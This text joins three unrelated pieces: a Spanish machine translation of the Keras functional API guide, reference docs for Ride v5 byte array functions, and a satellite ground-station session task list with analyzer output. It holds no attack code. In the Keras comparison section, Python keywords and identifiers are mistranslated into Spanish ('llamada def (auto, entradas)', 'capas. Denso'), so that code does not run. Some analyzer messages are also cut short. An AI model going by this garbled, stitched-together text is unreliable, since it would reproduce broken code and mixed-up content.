x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
autoencoder = keras.Model(encoder_input, decoder_output, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 _________________________________________________________________ reshape (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose (Conv2DTran (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_1 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d (UpSampling2D) (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_2 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_3 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
Tenga en cuenta que hacemos que la arquitectura de decodificación sea estrictamente simétrica a la arquitectura de codificación,para que obtengamos una forma de salida que sea igual a la forma de entrada (28, 28, 1).El reverso de una capa Conv2D es una capaConv2DTranspose, y el reverso de una capa MaxPooling2DLa capa es una capa UpSampling2D.
Todos los modelos son invocables, al igual que las capas.
Puede tratar cualquier modelo como si fuera una capa, llamándolo en una Entrada o en la salida de otra capa.Tenga en cuenta que al llamar a un modelo no solo está reutilizando la arquitectura del modelo, también está reutilizando sus pesos.
Veamos esto en acción. Aquí hay una versión diferente del ejemplo de autoencoder que crea un modelo de codificador, un modelo de decodificador, y encadenarlos en dos llamadas para obtener el modelo de autoencoder:
encoder_input = keras.Input(shape=(28, 28, 1), name='original_img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
decoder_input = keras.Input(shape=(16,), name='encoded_img')
x = layers.Reshape((4, 4, 1))(decoder_input)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
decoder = keras.Model(decoder_input, decoder_output, name='decoder')
decoder.summary()
autoencoder_input = keras.Input(shape=(28, 28, 1), name='img')
encoded_img = encoder(autoencoder_input)
decoded_img = decoder(encoded_img)
autoencoder = keras.Model(autoencoder_input, decoded_img, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= original_img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d_4 (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_5 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d_1 (MaxPooling2 (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_6 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_7 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d_1 (Glob (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "decoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= encoded_img (InputLayer) [(None, 16)] 0 _________________________________________________________________ reshape_1 (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose_4 (Conv2DTr (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_5 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d_1 (UpSampling2 (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_6 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_7 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 9,569 Trainable params: 9,569 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ encoder (Functional) (None, 16) 18672 _________________________________________________________________ decoder (Functional) (None, 28, 28, 1) 9569 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
Como puede ver, el modelo puede estar anidado: un modelo puede contener submodelos (ya que un modelo es como una capa).
Un caso de uso común para la anidación de modelos es * ensamblaje *. Como ejemplo, a continuación se explica cómo agrupar un conjunto de modelos en un solo modelo que promedia sus predicciones:
def get_model():
inputs = keras.Input(shape=(128,))
outputs = layers.Dense(1, activation='sigmoid')(inputs)
return keras.Model(inputs, outputs)
model1 = get_model()
model2 = get_model()
model3 = get_model()
inputs = keras.Input(shape=(128,))
y1 = model1(inputs)
y2 = model2(inputs)
y3 = model3(inputs)
outputs = layers.average([y1, y2, y3])
ensemble_model = keras.Model(inputs=inputs, outputs=outputs)
Manipulación de topologías gráficas complejas
Modelos con múltiples entradas y salidas
La API funcional facilita la manipulación de múltiples entradas y salidas. Esto no se puede manejar con la API secuencial.
Aquí hay un ejemplo simple.
Supongamos que está creando un sistema para clasificar los tickets de emisión personalizados por prioridad y enrutarlos al departamento correcto.
Tu modelo tendrá 3 entradas:
Título del ticket (entrada de texto)
Cuerpo del texto del ticket (entrada de texto)
Cualquier etiqueta agregada por el usuario (entrada categórica)
Tendrá dos salidas:
Puntuación de prioridad entre 0 y 1 (salida sigmoidea escalar)
El departamento que debe manejar el ticket (salida softmax sobre el conjunto de departamentos)
Construyamos este modelo en pocas líneas con la API funcional.
num_tags = 12 # Número de etiquetas de problemas únicos
num_words = 10000 # Tamaño del vocabulario obtenido al preprocesar datos de texto
num_departments = 4 # Número de departamentos para predicciones.
title_input = keras.Input(shape=(None,), name='title') # Secuencia de longitud variable de entradas
body_input = keras.Input(shape=(None,), name='body') # Secuencia de longitud variable de entradas
tags_input = keras.Input(shape=(num_tags,), name='tags') # Vectores binarios de tamaño `num_tags`
# Ingresa cada palabra en el título en un vector de 64 dimensiones
title_features = layers.Embedding(num_words, 64)(title_input)
# Ingresa cada palabra en el texto en un vector de 64 dimensiones
body_features = layers.Embedding(num_words, 64)(body_input)
# Reduce la secuencia de palabras ingresadas en el título en un solo vector de 128 dimensiones
title_features = layers.LSTM(128)(title_features)
# Reduce la secuencia de palabras ingresadas en el cuerpo en un solo vector de 32 dimensiones
body_features = layers.LSTM(32)(body_features)
# Combina todas las funciones disponibles en un solo vector grande mediante concatenación
x = layers.concatenate([title_features, body_features, tags_input])
# Pegua una regresión logística para la predicción de prioridad en la parte superior de las características
priority_pred = layers.Dense(1, activation='sigmoid', name='priority')(x)
# Stick a department classifier on top of the features
department_pred = layers.Dense(num_departments, activation='softmax', name='department')(x)
# Instancia un modelo de extremo a extremo que prediga tanto la prioridad como el departamento
model = keras.Model(inputs=[title_input, body_input, tags_input],
outputs=[priority_pred, department_pred])
Ploteando el modelo:
keras.utils.plot_model(model, 'multi_input_and_output_model.png', show_shapes=True)
Al compilar este modelo, podemos asignar diferentes pérdidas a cada salida. Incluso puede asignar diferentes pesos a cada pérdida, para modular su contribución a la pérdida total de entrenamiento.
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss=['binary_crossentropy', 'categorical_crossentropy'],
loss_weights=[1., 0.2])
Como dimos nombres a nuestras capas de salida, también podríamos especificar la pérdida de esta manera:
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss={'priority': 'binary_crossentropy',
'department': 'categorical_crossentropy'},
loss_weights=[1., 0.2])
Podemos entrenar el modelo pasando listas de matrices Numpy de entradas y objetivos:
import numpy as np
# Datos de entrada ficticios
title_data = np.random.randint(num_words, size=(1280, 10))
body_data = np.random.randint(num_words, size=(1280, 100))
tags_data = np.random.randint(2, size=(1280, num_tags)).astype('float32')
# Datos objetivo ficticios
priority_targets = np.random.random(size=(1280, 1))
dept_targets = np.random.randint(2, size=(1280, num_departments))
model.fit({'title': title_data, 'body': body_data, 'tags': tags_data},
{'priority': priority_targets, 'department': dept_targets},
epochs=2,
batch_size=32)
Epoch 1/2 40/40 [==============================] - 0s 12ms/step - loss: 1.3044 - priority_loss: 0.7146 - department_loss: 2.9490 Epoch 2/2 40/40 [==============================] - 0s 11ms/step - loss: 1.2906 - priority_loss: 0.6993 - department_loss: 2.9562 <tensorflow.python.keras.callbacks.History at 0x7fb48ae72f60>
Al llamar al ajuste con un objeto Dataset, debería producir untupla de listas como ([title_data, body_data, tags_data], [priority_targets, dept_targets])o una tupla de diccionarios como({'title': title_data, 'body': body_data, 'tags': tags_data}, {'priority': priority_targets, 'department': dept_targets}).
Para obtener una explicación más detallada, consulta la guía completa Guía de entrenamiento y evaluación.
Un modelo de Red neuronal residual de juguete
Además de los modelos con múltiples entradas y salidas, La API funcional facilita la manipulación de topologías de conectividad no lineal, es decir, modelos donde las capas no están conectadas secuencialmente. Esto tampoco se puede manejar con la API secuencial (como su nombre lo indica).
Un caso de uso común para esto son las conexiones residuales.
Construyamos un modelo de ResNet de juguete para CIFAR10 para demostrar esto.
inputs = keras.Input(shape=(32, 32, 3), name='img')
x = layers.Conv2D(32, 3, activation='relu')(inputs)
x = layers.Conv2D(64, 3, activation='relu')(x)
block_1_output = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_1_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_2_output = layers.add([x, block_1_output])
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_2_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_3_output = layers.add([x, block_2_output])
x = layers.Conv2D(64, 3, activation='relu')(block_3_output)
x = layers.GlobalAveragePooling2D()(x)
x = layers.Dense(256, activation='relu')(x)
x = layers.Dropout(0.5)(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs, outputs, name='toy_resnet')
model.summary()
Model: "toy_resnet" __________________________________________________________________________________________________ Layer (type) Output Shape Param # Connected to ================================================================================================== img (InputLayer) [(None, 32, 32, 3)] 0 __________________________________________________________________________________________________ conv2d_8 (Conv2D) (None, 30, 30, 32) 896 img[0][0] __________________________________________________________________________________________________ conv2d_9 (Conv2D) (None, 28, 28, 64) 18496 conv2d_8[0][0] __________________________________________________________________________________________________ max_pooling2d_2 (MaxPooling2D) (None, 9, 9, 64) 0 conv2d_9[0][0] __________________________________________________________________________________________________ conv2d_10 (Conv2D) (None, 9, 9, 64) 36928 max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_11 (Conv2D) (None, 9, 9, 64) 36928 conv2d_10[0][0] __________________________________________________________________________________________________ add (Add) (None, 9, 9, 64) 0 conv2d_11[0][0] max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_12 (Conv2D) (None, 9, 9, 64) 36928 add[0][0] __________________________________________________________________________________________________ conv2d_13 (Conv2D) (None, 9, 9, 64) 36928 conv2d_12[0][0] __________________________________________________________________________________________________ add_1 (Add) (None, 9, 9, 64) 0 conv2d_13[0][0] add[0][0] __________________________________________________________________________________________________ conv2d_14 (Conv2D) (None, 7, 7, 64) 36928 add_1[0][0] __________________________________________________________________________________________________ global_average_pooling2d (Globa (None, 64) 0 conv2d_14[0][0] __________________________________________________________________________________________________ dense_9 (Dense) (None, 256) 16640 global_average_pooling2d[0][0] __________________________________________________________________________________________________ dropout (Dropout) (None, 256) 0 dense_9[0][0] __________________________________________________________________________________________________ dense_10 (Dense) (None, 10) 2570 dropout[0][0] ================================================================================================== Total params: 223,242 Trainable params: 223,242 Non-trainable params: 0 __________________________________________________________________________________________________
Ploteando el modelo:
keras.utils.plot_model(model, 'mini_resnet.png', show_shapes=True)
Vamos a entrenarlo:
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss='categorical_crossentropy',
metrics=['acc'])
model.fit(x_train, y_train,
batch_size=64,
epochs=1,
validation_split=0.2)
Downloading data from https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 170500096/170498071 [==============================] - 2s 0us/step 625/625 [==============================] - 4s 6ms/step - loss: 1.8840 - acc: 0.2842 - val_loss: 1.5108 - val_acc: 0.4309 <tensorflow.python.keras.callbacks.History at 0x7fb48a701f28>
Compartir capas
Otro buen uso de la API funcional son los modelos que usan capas compartidas. Las capas compartidas son instancias de capa que se reutilizan varias veces en un mismo modelo: aprenden características que corresponden a múltiples rutas en el gráfico de capas.
Las capas compartidas a menudo se usan para codificar entradas que provienen de espacios similares (por ejemplo, dos piezas de texto diferentes que presentan un vocabulario similar), ya que permiten compartir información entre estas diferentes entradas y hacen posible entrenar un modelo de este tipo en menos datos. Si se ve una palabra determinada en una de las entradas, eso beneficiará el procesamiento de todas las entradas que pasan por la capa compartida.
Para compartir una capa en la API funcional, simplemente llame a la misma instancia de capa varias veces. Por ejemplo, aquí hay una capa Ingresa (del ingles Embedding) compartida entre dos entradas de texto diferentes:
# Ingreso de 1000 palabras únicas asignadas a vectores de 128 dimensiones
shared_embedding = layers.Embedding(1000, 128)
# Secuencia de longitud variable de enteros
text_input_a = keras.Input(shape=(None,), dtype='int32')
# Secuencia de longitud variable de enteros
text_input_b = keras.Input(shape=(None,), dtype='int32')
# Reutilizamos la misma capa para codificar ambas entradas
encoded_input_a = shared_embedding(text_input_a)
encoded_input_b = shared_embedding(text_input_b)
Extracción y reutilización de nodos en el gráfico de capas
Debido a que el gráfico de capas que está manipulando en la API funcional es una estructura de datos estática, se puede acceder e inspeccionarlo. Así es como podemos trazar modelos funcionales como imágenes, por ejemplo.
Esto también significa que podemos acceder a las activaciones de capas intermedias ("nodos" en el gráfico) y reutilizarlas en otros lugares. ¡Esto es extremadamente útil para la extracción de características, por ejemplo!
Veamos un ejemplo. Este es un modelo VGG19 con pesas pre-entrenadas en ImageNet:
from tensorflow.keras.applications import VGG19
vgg19 = VGG19()
Downloading data from https://storage.googleapis.com/tensorflow/keras-applications/vgg19/vgg19_weights_tf_dim_ordering_tf_kernels.h5 574717952/574710816 [==============================] - 2s 0us/step
Y estas son las activaciones intermedias del modelo, obtenidas al consultar la estructura de datos del gráfico:
features_list = [layer.output for layer in vgg19.layers]
Podemos usar estas características para crear un nuevo modelo de extracción de características, que devuelve los valores de las activaciones de la capa intermedia, y podemos hacer todo esto en 3 líneas.
feat_extraction_model = keras.Model(inputs=vgg19.input, outputs=features_list)
img = np.random.random((1, 224, 224, 3)).astype('float32')
extracted_features = feat_extraction_model(img)
Esto es útil cuando implementa la transferencia de estilo neural, entre otras cosas.
Extendiendo la API escribiendo capas personalizadas
tf.keras tiene una amplia gama de capas incorporadas. Aquí están algunos ejemplos:
Capas convolucionales: Conv1D,Conv2D,Conv3D,Conv2DTranspose, etc.
Capas de agrupación: MaxPooling1D,MaxPooling2D,MaxPooling3D,AveragePooling1D, etc.
Capas RNN: GRU,LSTM,ConvLSTM2D, etc.
BatchNormalization,Dropout,Embedded, etc.
Si no encuentras lo que necesitas, es fácil extender la API creando tus propias capas.
Todas las capas subclasifican la clase Layer e implementan:
Un método call, que especifica el cálculo realizado por la capa.
Un método build, que crea los pesos de la capa (tenga en cuenta que esto es solo una convención de estilo; también puede crear pesos en__init__).
Para obtener más información sobre cómo crear capas desde cero, consulta la guía Guía para escribir capas y modelos desde cero.
Aquí hay una implementación simple de una capa Densa:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
Si deseas que tu capa personalizada admita la serialización, también debes definir un método get_config,que devuelve los argumentos del constructor de la instancia de capa:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
def get_config(self):
return {'units': self.units}
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(
config, custom_objects={'CustomDense': CustomDense})
Opcionalmente, también podría implementar el método de clase from_config (cls, config), que se encarga de recrear una instancia de capa dado su diccionario de configuración. La implementación predeterminada de from_config es:
def from_config(cls, config):
return cls(**config)
Cuándo usar la API funcional
¿Cómo decidir si usar la API funcional para crear un nuevo modelo o simplemente subclasificar la clase Modelo directamente?
En general, la API funcional es de nivel superior, más fácil y segura de usar, y tiene una serie de características que los modelos de subclases no admiten.
Sin embargo, la subclasificación de modelos le brinda una mayor flexibilidad al crear modelos que no se pueden expresar fácilmente como gráficos acíclicos dirigidos de capas (por ejemplo, no podría implementar un Tree-RNN con la API funcional, tendría que subclasificar Model directamente).
Estas son las fortalezas de la API funcional:
Las propiedades enumeradas a continuación también son ciertas para los modelos secuenciales (que también son estructuras de datos), pero no son ciertas para los modelos subclasificados (que son bytecode de Python, no estructuras de datos).
Es menos detallado.
No super (MyClass, self) .__ init __ (...), no def call (self, ...):, etc.
Comparar:
input = keras.Input (shape = (32,))
x = capas. Denso (64, activación = 'relu') (entradas)
salidas = capas. Denso (10) (x)
mlp = keras.Model (entradas, salidas)
Con la versión subclaseada:
clase MLP (keras.Model):
def __init __ (self, ** kwargs):
super (MLP, self) .__ init __ (** kwargs)
self.dense_1 = capas.Dense (64, activación = 'relu')
self.dense_2 = layers.Dense (10)
llamada def (auto, entradas):
x = self.dense_1 (entradas)
return self.dense_2 (x)
# Instanciar el modelo.
mlp = MLP ()
# Necesario para crear el estado del modelo.
# El modelo no tiene un estado hasta que se llama al menos una vez.
_ = mlp (tf.zeros ((1, 32)))
Valida su modelo mientras lo está definiendo.
En la API funcional, su especificación de entrada (forma y dtype) se crea de antemano (a través de Input), y cada vez que llama a una capa, la capa comprueba que la especificación que se le pasa coincide con sus supuestos, y generará un mensaje de error útil si no.
Esto garantiza que se ejecutará cualquier modelo que pueda construir con la API funcional. Toda la depuración (que no sea la depuración relacionada con la convergencia) ocurrirá estáticamente durante la construcción del modelo, y no en el momento de la ejecución. Esto es similar a la comprobación de tipo en un compilador.
Tu modelo funcional es trazable e inspeccionable.
Puedes trazar el modelo como un gráfico, y puedes acceder fácilmente a los nodos intermedios en este gráfico, por ejemplo, para extraer y reutilizar las activaciones de las capas intermedias, como vimos en un ejemplo anterior:
features_list = [layer.output para la capa en vgg19.layers]
feat_extraction_model = keras.Model (input = vgg19.input, salidas = features_list)
Su modelo funcional puede ser serializado o clonado.
Debido a que un modelo funcional es una estructura de datos en lugar de un fragmento de código, es serializable de forma segura y se puede guardar como un único archivo que le permite recrear exactamente el mismo modelo sin tener acceso a ninguno de los códigos originales. Consulta nuestra guía de guardado y serialización para obtener más detalles.
Estas son las debilidades de la API funcional:
No admite arquitecturas dinámicas.
La API funcional trata los modelos como DAG de capas. Esto es cierto para la mayoría de las arquitecturas de aprendizaje profundo, pero no para todas: por ejemplo, las redes recursivas o los RNN de árbol no siguen este supuesto y no se pueden implementar en la API funcional.
A veces, solo necesitas escribir todo desde cero.
Al escribir actividades avanzadas, es posible que desee hacer cosas que están fuera del alcance de "definir un DAG de capas": por ejemplo, es posible que desee exponer múltiples métodos personalizados de entrenamiento e inferencia en su instancia de modelo. Esto requiere subclases.
Para profundizar más en las diferencias entre la API funcional y la subclasificación de modelos, puede leer ¿Qué son las API simbólicas e imperativas en TensorFlow 2.0?.
Mezcla y combina diferentes estilos de API
Es importante destacar que elegir entre la subclasificación de API funcional o modelo no es una decisión binaria que lo restringe a una categoría de modelos. Todos los modelos en la API tf.keras pueden interactuar con cada uno, ya sean modelos secuenciales, modelos funcionales o modelos / capas subclasificados escritos desde cero.
Siempre puede usar un modelo funcional o modelo secuencial como parte de un modelo / capa subclasificado:
units = 32
timesteps = 10
input_dim = 5
# Define a Functional model
inputs = keras.Input((None, units))
x = layers.GlobalAveragePooling1D()(inputs)
outputs = layers.Dense(1, activation='sigmoid')(x)
model = keras.Model(inputs, outputs)
class CustomRNN(layers.Layer):
def __init__(self):
super(CustomRNN, self).__init__()
self.units = units
self.projection_1 = layers.Dense(units=units, activation='tanh')
self.projection_2 = layers.Dense(units=units, activation='tanh')
# Our previously-defined Functional model
self.classifier = model
def call(self, inputs):
outputs = []
state = tf.zeros(shape=(inputs.shape[0], self.units))
for t in range(inputs.shape[1]):
x = inputs[:, t, :]
h = self.projection_1(x)
y = h + self.projection_2(state)
state = y
outputs.append(y)
features = tf.stack(outputs, axis=1)
print(features.shape)
return self.classifier(features)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, timesteps, input_dim)))
(1, 10, 32)
Inversamente, puede usar cualquier Capa o Modelo subclasificado en la API Funcional siempre que implemente un método call que siga uno de los siguientes patrones:
call (self, input, ** kwargs)dondeinputes un tensor o una estructura anidada de tensores (por ejemplo, una lista de tensores), y donde** kwargsson argumentos no tensoriales (no input )
call (self, input, training = None, ** kwargs)dondetraininges un valor booleano que indica si la capa debe comportarse en modo de entrenamiento y modo de inferencia.
call (self, input, mask = None, ** kwargs)dondemaskes un tensor de máscara booleano (útil para RNN, por ejemplo).
call (self, input, training = None, mask = None, ** kwargs)- por supuesto, puede tener tanto un comportamiento específico de enmascaramiento como de entrenamiento al mismo tiempo.
Además, si implementa el método get_config en su Capa o Modelo personalizado, los modelos funcionales que cree con él seguirán siendo serializables y clonables.
Aquí hay un ejemplo rápido en el que usamos un RNN personalizado escrito desde cero en un modelo funcional:
units = 32
timesteps = 10
input_dim = 5
batch_size = 16
class CustomRNN(layers.Layer):
def __init__(self):
super(CustomRNN, self).__init__()
self.units = units
self.projection_1 = layers.Dense(units=units, activation='tanh')
self.projection_2 = layers.Dense(units=units, activation='tanh')
self.classifier = layers.Dense(1, activation='sigmoid')
def call(self, inputs):
outputs = []
state = tf.zeros(shape=(inputs.shape[0], self.units))
for t in range(inputs.shape[1]):
x = inputs[:, t, :]
h = self.projection_1(x)
y = h + self.projection_2(state)
state = y
outputs.append(y)
features = tf.stack(outputs, axis=1)
return self.classifier(features)
# Tenga en cuenta que especificamos un tamaño de lote estático para las entradas con `batch_shape`
# arg, porque el cálculo interno de `CustomRNN` requiere un tamaño de lote estático
# (cuando creamos el tensor de ceros `estado`).
inputs = keras.Input(batch_shape=(batch_size, timesteps, input_dim))
x = layers.Conv1D(32, 3)(inputs)
outputs = CustomRNN()(x)
model = keras.Model(inputs, outputs)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, 10, 5)))
¡Esto concluye nuestra guía sobre la API funcional "Keras"!
Ahora tienes a tu alcance un poderoso conjunto de herramientas para construir modelos de aprendizaje profundo.
|
# [Ride v5] Byte array functions
# Name Description Complexity
1 drop(ByteVector, Int): ByteVector Returns the byte array without the first N bytes 6
2 dropRight(ByteVector, Int): ByteVector Returns the byte array without the last N bytes 6
3 size(ByteVector): Int Returns the number of bytes in the byte array 1
4 take(ByteVector, Int): ByteVector Returns the first N bytes of the byte array 6
5 takeRight(ByteVector, Int): ByteVector Returns the last N bytes of the byte array 6
# drop(ByteVector, Int): ByteVector
Returns the byte array without the first N bytes.
drop(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
# Examples
drop("Ride".toBytes(), 2) # Returns the byte array without the first 2 bytes
drop(125.toBytes(), 2) # Returns the byte array without the first 2 bytes
drop(base16'52696465', 3) # Returns the byte array without the first 3 bytes
drop(base58'37BPKA', 3) # Returns the byte array without the first 3 bytes
drop(base64'UmlkZQ==', 3) # Returns the byte array without the first 3 bytes
Number N.
# dropRight(ByteVector, Int): ByteVector
Returns the byte array without the last N bytes.
dropRight(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
dropRight("Ride".toBytes(), 2) # Returns the byte array without the last 2 bytes
dropRight(125.toBytes(), 2) # Returns the byte array without the last 2 bytes
dropRight(base16'52696465', 3) # Returns the byte array without the last 3 bytes
dropRight(base58'37BPKA', 3) # Returns the byte array without the last 3 bytes
dropRight(base64'UmlkZQ==', 3) # Returns the byte array without the last 3 bytes
# size(ByteVector): Int
Returns the number of bytes in the byte array.
size(byteVector: ByteVector): Int
# Parameters
# byteVector: ByteVector
Byte array.
# Examples
size("Hello".toBytes()) # Returns 5
size("Hello world".toBytes()) # Returns 11
size(64.toBytes()) # Returns 8 because all integers in Ride take 8 bytes
size(200000.toBytes()) # Returns 8 because all integers in Ride take 8 bytes
size(base58'37BPKA') # Returns 4
# take(ByteVector, Int): ByteVector
Returns the first N bytes of the byte array.
take(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
take(base58'37BPKA', 0) # Returns the empty byte array
take(base58'37BPKA', 1) # Returns the byte array consisting of first byte of initial byte array
take(base58'37BPKA', 15) # Returns whole byte array
take(base58'37BPKA', -10) # Returns the empty byte array
# takeRight(ByteVector, Int): ByteVector
Returns the last N bytes of the byte array.
takeRight(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
takeRight(base58'37BPKA', 2) # Returns the last 2 bytes of the byte array
|
Index Start Time Stop Time Max. Elevation Phase Primary GS Type Tasks Status
151 2018-12-28 10:41:21+01:00 2018-12-28 10:53:49+01:00 N/A° Extended Mission N/A [TBD] ☑
Goal
Telemetry download. Energy saving.
Tasklist
tasks = [
[[tc.SetBitrate(1, BaudRate.BaudRate9600), 5], SendLoop, WaitMode.NoWait],
[[tc.SendBeacon(), 20], SendLoop, WaitMode.NoWait],
[tc.ListFiles(2, '/'), Send, WaitMode.Wait],
# wait for better SNR
[[tc.SendBeacon(), 20], SendLoop, WaitMode.NoWait],
# More telemetry between sessions 148 and 151
[tc.DownloadFile(10, '/telemetry.current', [i for i in range(6, 370, 24)]), Send, WaitMode.Wait],
[tc.DownloadFile(11, '/telemetry.previous', [i for i in range(1206, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(12, '/telemetry.previous', [i for i in range(1212, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(13, '/telemetry.current', [i for i in range(18, 370, 24)]), Send, WaitMode.Wait],
[tc.DownloadFile(14, '/telemetry.previous', [i for i in range(1218, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(15, '/telemetry.previous', [i for i in range(1231, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(16, '/telemetry.previous', [i for i in range(1237, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(17, '/telemetry.previous', [i for i in range(1243, 2280, 50)]), Send, WaitMode.Wait],
[[tc.SendBeacon(), 20], SendLoop, WaitMode.NoWait],
]
Analyzer Output
======================================= General =======================================
[33m[Warning] Bitrate not restored (1200)[0m
======================== Resources utilization for THIS session ========================
# Name Is Current Session Session Session Session Session Session Notes
scheduled? bitrate downlink downlink uplink uplink power power
[bps] frames duration frames duration budget budget
count [s] count [s] energy mean
[mWh] power
[mW]
--- ------------ ------------ --------- ---------- ---------- --------- ---------- --------- --------- ---------------------------------------------------------------------
1 SetBitrate False 9600 1 0.32 1 1.03 0.3 N/A [36m[Info] In SendLoop mode - a telecommand in every .[0m
2 SendBeacon False 9600 1 0.51 1 1.02 0.4 N/A [36m[Info] In SendLoop mode - a telecommand in every .[0m
3 ListFiles False 9600 5 1.28 1 1.04 1.1 N/A [33m[Warning] Waiting is not recommended[0m
4 SendBeacon False 9600 1 0.51 1 1.02 0.4 N/A [36m[Info] In SendLoop mode - a telecommand in every .[0m
5 DownloadFile False 9600 16 3.41 1 1.59 2.8 N/A
6 DownloadFile False 9600 22 4.57 1 1.75 3.8 N/A
7 DownloadFile False 9600 22 4.57 1 1.75 3.8 N/A
8 DownloadFile False 9600 15 3.22 1 1.56 2.7 N/A
9 DownloadFile False 9600 22 4.57 1 1.75 3.8 N/A
